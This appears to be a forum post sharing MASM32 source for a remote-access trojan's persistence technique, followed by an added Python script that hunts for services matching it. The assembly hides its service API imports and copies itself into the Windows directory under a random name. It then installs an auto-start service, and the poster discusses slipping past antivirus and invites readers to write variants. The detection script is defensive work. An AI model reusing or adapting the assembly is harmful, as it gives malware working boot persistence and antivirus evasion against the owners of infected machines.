A friend originally gave this to me and asked me to find the backdoor in it, but this RAT is too powerful and its author's assembly skills are very strong, so I didn't find it. By sheer coincidence, though, I discovered its hiding technique and instantly took a liking to it, so I wrote it up in Win32 to share. Three minutes ago, active defense would intercept it, yet after the computer reboots the program can still run; I tested it again just now and it has already been classified as a high-risk virus. Speechless, 360... The source is below; modify it as you need:
Source (MASM32). Comments translated; the listing as posted passed 0 as the service handle to ChangeServiceConfig2 and StartService, passed the bare description string where a SERVICE_DESCRIPTION structure is expected, and did not pop wsprintf's cdecl arguments; those three places are fixed and marked below.

```asm
.386
.model flat, stdcall
option casemap:none
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib

; ------------------------------------------------------------ strings
.const
sz11                   db "The program is already in the Windows directory", 0
sz22                   db "Title", 0
szUnlockService        db "UnlockServiceDatabase", 0
szExe                  db "\%c%c%c%c%c%c.exe", 0     ; random 6-letter file name
szTest                 db ".Test1", 0                 ; service name
szCunMang              db ".CunMang1", 0              ; display name
szMiaoShu              db "BingDuMiaoShu", 0          ; service description
szGetModuleFileName    db "GetModuleFileNameA", 0
szGetWindowsDirectory  db "GetWindowsDirectoryA", 0
szCopyFile             db "CopyFileA", 0
szOpenSCM              db "OpenSCManagerA", 0
szCloseServiceHandle   db "CloseServiceHandle", 0
szStartService         db "StartServiceA", 0
szChangeService        db "ChangeServiceConfig2A", 0
szAdvapi32             db "ADVAPI32.DLL", 0
szCreateService        db "CreateServiceA", 0
szGetTickCount         db "GetTickCount", 0
szKernel               db "kernel32.dll", 0
szLockService          db "LockServiceDatabase", 0

; ------------------------------------------------------------ data / resolved addresses
.data
szFileName             db 128 dup(?)   ; full path of the running module
szWindowDirect         db 128 dup(?)   ; Windows directory
szNullFileName         db 128 dup(?)   ; Windows directory + "\xxxxxx.exe"
szMuBiaoName           db 128 dup(?)   ; never written, so it stays zero: used to wipe szFileName
szTime                 dd 1            ; LCG state (rand() seed = 1)
szExeBuffer            db 128 dup(?)   ; formatted "\xxxxxx.exe"
HandleData             dd ?            ; SCM handle
HandleCreateService    dd ?            ; service handle
szLocalService1        dd ?            ; service-database lock handle
sdDesc                 dd offset szMiaoShu   ; SERVICE_DESCRIPTION { lpDescription }
addrKernel             dd ?
addrGetModuleFileName  dd ?
addrGetWindowsDirectory dd ?
addrCopyFile           dd ?
addrAdv                dd ?
addrOpenSCM            dd ?
addrOpenService        dd ?
addrCreateService      dd ?
addrCloseServiceHandle dd ?
addrLockService        dd ?
addrUnlockService      dd ?
addrChangeService      dd ?
addrStartService       dd ?
addrGetTickCount       dd ?

; ------------------------------------------------------------ code
.code
; Returns ((rand() + 3) * GetTickCount()) mod szVar in eax.  rand() here is the
; MSVC CRT generator: state = state * 214013 + 2531011; result = (state >> 16) & 7FFFh.
_SuanFa proc szVar:DWORD
    push esi
    call addrGetTickCount
    mov  esi, eax                 ; esi = tick count
    mov  eax, szTime
    imul eax, eax, 343FDh         ; 214013
    add  eax, 269EC3h             ; 2531011
    mov  szTime, eax              ; advance the generator state
    sar  eax, 10h
    and  eax, 7FFFh               ; rand() in 0..32767
    add  eax, 3
    xor  edx, edx                 ; 32-bit unsigned dividend (imul below leaves edx alone)
    imul eax, esi                 ; low 32 bits of (rand() + 3) * tick
    div  szVar
    pop  esi
    mov  eax, edx                 ; return the remainder
    ret
_SuanFa endp

start:
; -------- resolve the sensitive ADVAPI32.DLL imports at run time (nothing in the import table)
    push offset szAdvapi32
    call LoadLibrary
    mov  addrAdv, eax
    push offset szOpenSCM
    push addrAdv
    call GetProcAddress
    mov  addrOpenSCM, eax
    push offset szCloseServiceHandle
    push addrAdv
    call GetProcAddress
    mov  addrCloseServiceHandle, eax
    push offset szStartService
    push addrAdv
    call GetProcAddress
    mov  addrStartService, eax
    push offset szLockService
    push addrAdv
    call GetProcAddress
    mov  addrLockService, eax
    push offset szUnlockService
    push addrAdv
    call GetProcAddress
    mov  addrUnlockService, eax
    push offset szChangeService
    push addrAdv
    call GetProcAddress
    mov  addrChangeService, eax
    push offset szCreateService
    push addrAdv
    call GetProcAddress
    mov  addrCreateService, eax
; -------- same for the kernel32 functions
    push offset szKernel
    call GetModuleHandle
    mov  addrKernel, eax
    push offset szGetModuleFileName
    push addrKernel
    call GetProcAddress
    mov  addrGetModuleFileName, eax
    push offset szGetWindowsDirectory
    push addrKernel
    call GetProcAddress
    mov  addrGetWindowsDirectory, eax
    push offset szCopyFile
    push addrKernel
    call GetProcAddress
    mov  addrCopyFile, eax
    push offset szGetTickCount
    push addrKernel
    call GetProcAddress
    mov  addrGetTickCount, eax

    push 128
    push offset szFileName
    push NULL
    call addrGetModuleFileName    ; szFileName = path of this module (return value = length)
    push 128
    push offset szWindowDirect
    call addrGetWindowsDirectory  ; e.g. C:\WINDOWS (GetSystemDirectory would give system32)
    push 128
    push offset szNullFileName
    call addrGetWindowsDirectory  ; second copy, extended with the file name below

    ; strlen(szWindowDirect) with repne scasb
    mov  edi, offset szWindowDirect
    mov  ebx, edi
    mov  ecx, 128                 ; scan at most 128 bytes
    mov  al, 0                    ; look for the terminating zero
    cld
    repne scasb                   ; stops when ecx = 0 or the zero is found
    sub  edi, ebx
    sub  edi, 1                   ; edi = length without the terminator
    mov  ecx, edi

    ; does szFileName start with the Windows directory?  (prefix compare only,
    ; so anything below the Windows directory matches as well)
    mov  esi, offset szFileName
    mov  edi, offset szWindowDirect
s:
    mov  al, [esi]
    mov  bl, [edi]
    cmp  al, bl
    jnz  WindowsName              ; mismatch: not in the Windows directory yet, copy there
    inc  esi
    inc  edi
    loop s
    jmp  _Service                 ; prefix matched: already running from the Windows directory

WindowsName:                      ; build "\xxxxxx.exe" from six random letters and copy
    push 1Ah
    call _SuanFa                  ; 0..25
    push 61h
    pop  edi                      ; edi = 'a'
    add  eax, edi
    push eax                      ; 1st character
    push 1Ah
    call _SuanFa
    add  eax, edi
    push eax                      ; 2nd character
    push 1Ah
    call _SuanFa
    add  eax, edi
    push eax                      ; 3rd character
    push 1Ah
    call _SuanFa
    add  eax, edi
    push eax                      ; 4th character
    push 1Ah
    call _SuanFa
    add  eax, edi
    push eax                      ; 5th character
    push 1Ah
    call _SuanFa
    add  eax, edi
    push eax                      ; 6th character
    push offset szExe
    push offset szExeBuffer
    call wsprintf                 ; szExeBuffer = "\xxxxxx.exe"
    add  esp, 8*4                 ; wsprintf is cdecl: caller pops the 8 arguments (missing in the posted listing)
    invoke lstrcat, offset szNullFileName, offset szExeBuffer
    push TRUE                     ; bFailIfExists
    push offset szNullFileName
    push offset szFileName
    call addrCopyFile             ; copy this module to %WINDIR%\xxxxxx.exe
    invoke RtlMoveMemory, offset szFileName, offset szMuBiaoName, 120   ; wipe szFileName
    invoke RtlMoveMemory, offset szFileName, offset szNullFileName, 120 ; szFileName = new path
    invoke MessageBox, NULL, offset szNullFileName, offset szWindowDirect, MB_OK
    jmp  Windows

_Service:
    invoke MessageBox, NULL, offset sz11, offset sz22, MB_OK

Windows:
    push SC_MANAGER_ALL_ACCESS    ; shows as 0F003Fh in OllyDbg; in IDA right-click > Use standard symbolic constant
    push NULL                     ; SERVICES_ACTIVE_DATABASE
    push NULL                     ; local machine
    call addrOpenSCM              ; connect to the service control manager
    mov  HandleData, eax
    mov  edi, eax                 ; keep the handle in edi, eax is needed for arguments
    xor  ebx, ebx
    cmp  edi, ebx
    jz   _exit                    ; OpenSCManager failed (typically: not running elevated)
    push ebx                      ; lpPassword
    push ebx                      ; lpServiceStartName (LocalSystem)
    push ebx                      ; lpDependencies
    push ebx                      ; lpdwTagId
    push ebx                      ; lpLoadOrderGroup
    push offset szFileName        ; lpBinaryPathName
    push SERVICE_ERROR_NORMAL
    push SERVICE_AUTO_START       ; started by the SCM at boot
    push SERVICE_WIN32_OWN_PROCESS or SERVICE_INTERACTIVE_PROCESS
    push SERVICE_ALL_ACCESS
    push offset szCunMang         ; display name
    push offset szTest            ; service name
    push edi                      ; hSCManager
    call addrCreateService        ; create the service object in the SCM database
    mov  HandleCreateService, eax ; 0 on failure, e.g. when the service already exists
    push edi
    call addrLockService          ; lock the database
    mov  szLocalService1, eax
    push offset sdDesc            ; SERVICE_DESCRIPTION (the posted listing passed the bare string)
    push 1                        ; SERVICE_CONFIG_DESCRIPTION
    push HandleCreateService      ; hService (the posted listing passed 0 here)
    call addrChangeService
    push szLocalService1
    call addrUnlockService
    push 0                        ; lpServiceArgVectors
    push 0                        ; dwNumServiceArgs
    push HandleCreateService      ; hService (the posted listing passed 0 here)
    call addrStartService
_exit:
    invoke ExitProcess, NULL
end start
```

Note that the binary never calls StartServiceCtrlDispatcher, so when the SCM launches it at boot the process runs its code (and shows its dialog) but the start itself is reported as failed once the SCM's timeout expires.
Very simple; there is no harmful operation in it, it only pops up a dialog box as a notice. It took a day and a night to reverse and I'm very tired, and with 360 getting in the way I really don't have the heart to rewrite it. Once you've understood it, write a variant of it. Sigh, off to drink some soy milk powder for nourishment... (For technical exchange only)
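As an added example, not code from the post above, the following Python models the listing's `_SuanFa` name generator (so the shape of the dropped file name, six lowercase letters under the Windows directory, is explicit) and then hunts for services that match that shape, weighting the other traits the listing sets: SERVICE_AUTO_START, SERVICE_INTERACTIVE_PROCESS and the dot-prefixed service name ".Test1". The sample records are constructed; the registry collector reads the `ImagePath`, `Start`, `Type` and `Description` values under `HKLM\SYSTEM\CurrentControlSet\Services\<name>` and is only used on Windows.

```python
"""Hunt for the service persistence pattern used by the listing above (added example)."""
import os
import re
import sys
from dataclasses import dataclass

# Constants taken from the listing: MSVC rand() LCG (343FDh / 269EC3h), 'a' + value mod 1Ah
MSVC_RAND_A = 214013
MSVC_RAND_C = 2531011
SERVICE_AUTO_START = 2              # registry "Start" value for an auto-start service
SERVICE_WIN32_OWN_PROCESS = 0x10    # bits of the registry "Type" value
SERVICE_INTERACTIVE_PROCESS = 0x100
NAME_RE = re.compile(r"[a-z]{6}\.exe", re.IGNORECASE)  # generator emits lowercase; NTFS is case-insensitive


def suanfa_name(tick_count: int, seed: int = 1, length: int = 6) -> str:
    """Model of _SuanFa: per character, state = state*A + C (mod 2^32), r = (state >> 16) & 0x7FFF,
    ch = 'a' + (((r + 3) * tick) mod 2^32) mod 26.  The listing re-reads GetTickCount() for every
    character; this model assumes all six reads fall in the same millisecond."""
    state, out = seed, []
    for _ in range(length):
        state = (state * MSVC_RAND_A + MSVC_RAND_C) & 0xFFFFFFFF
        r = ((state >> 16) & 0x7FFF) + 3
        out.append(chr(ord("a") + ((r * tick_count) & 0xFFFFFFFF) % 26))
    return "".join(out)


@dataclass
class ServiceRecord:
    name: str
    image_path: str        # raw ImagePath value (may be quoted, may carry arguments)
    start: int             # Start value; 2 = auto start
    service_type: int      # Type value; 0x10 own process, 0x100 interactive flag
    description: str = ""


def image_file(image_path: str) -> str:
    """Return only the executable from an ImagePath, dropping quotes and arguments."""
    p = os.path.expandvars(image_path.strip())
    if p.startswith('"'):
        end = p.find('"', 1)
        return p[1:end] if end > 0 else p[1:]
    return p.split(" ", 1)[0]


def suspicion_reasons(rec: ServiceRecord, windir: str = r"C:\Windows") -> list:
    """Indicators the record shares with the listing's service; empty list = not flagged.
    A [a-z]{6}.exe directly in the Windows directory is required, the rest add weight."""
    directory, _, base = image_file(rec.image_path).rpartition("\\")
    if directory.lower() != windir.lower() or not NAME_RE.fullmatch(base):
        return []
    reasons = [f"binary {base} sits directly in {windir} with a [a-z]{{6}}.exe name"]
    if rec.start == SERVICE_AUTO_START:
        reasons.append("SERVICE_AUTO_START")
    if rec.service_type & SERVICE_INTERACTIVE_PROCESS:
        reasons.append("SERVICE_INTERACTIVE_PROCESS set")
    if rec.name.startswith("."):
        reasons.append(f"service name {rec.name!r} begins with a dot")
    return reasons


def find_suspicious(records, windir: str = r"C:\Windows") -> dict:
    """Map service name -> reasons for every flagged record."""
    flagged = {}
    for rec in records:
        why = suspicion_reasons(rec, windir)
        if why:
            flagged[rec.name] = why
    return flagged


def collect_from_registry() -> list:
    """Windows only: read the same fields from HKLM\\SYSTEM\\CurrentControlSet\\Services."""
    import winreg  # present only on Windows
    records = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Services") as root:
        for i in range(winreg.QueryInfoKey(root)[0]):
            name = winreg.EnumKey(root, i)
            try:
                with winreg.OpenKey(root, name) as key:
                    def value(v, default):
                        try:
                            return winreg.QueryValueEx(key, v)[0]
                        except OSError:
                            return default
                    records.append(ServiceRecord(name, str(value("ImagePath", "")),
                                                 int(value("Start", -1)), int(value("Type", 0)),
                                                 str(value("Description", ""))))
            except OSError:
                continue  # key not readable from this context
    return records


# Constructed sample, not data from a real host.  ".Test1" and "BingDuMiaoShu" are the names
# hard-coded in the listing; "sktjkx" is suanfa_name(1).  Spooler shows that auto-start plus
# the interactive flag alone is not an indicator.
SAMPLE_RECORDS = [
    ServiceRecord("wuauserv", r"C:\Windows\System32\svchost.exe -k netsvcs", 2, 0x20),
    ServiceRecord("Spooler", r'"C:\Windows\System32\spoolsv.exe"', 2, 0x110, "Print Spooler"),
    ServiceRecord(".Test1", r"C:\Windows\sktjkx.exe", 2, 0x110, "BingDuMiaoShu"),
    ServiceRecord("sixltr", r"C:\Windows\abcdef.exe", 3, 0x10),
]

if __name__ == "__main__":
    records = collect_from_registry() if sys.platform == "win32" else SAMPLE_RECORDS
    for name, why in find_suspicious(records, os.environ.get("SystemRoot", r"C:\Windows")).items():
        print(f"{name}: " + "; ".join(why))
```

Run it elevated on a Windows host to walk the live service database; anywhere else it runs against the constructed sample. Because `_SuanFa` multiplies the MSVC `rand()` output by the tick count before reducing mod 26, the six letters cannot be predicted from the seed alone, which is why the hunt keys on the name shape rather than on a fixed name.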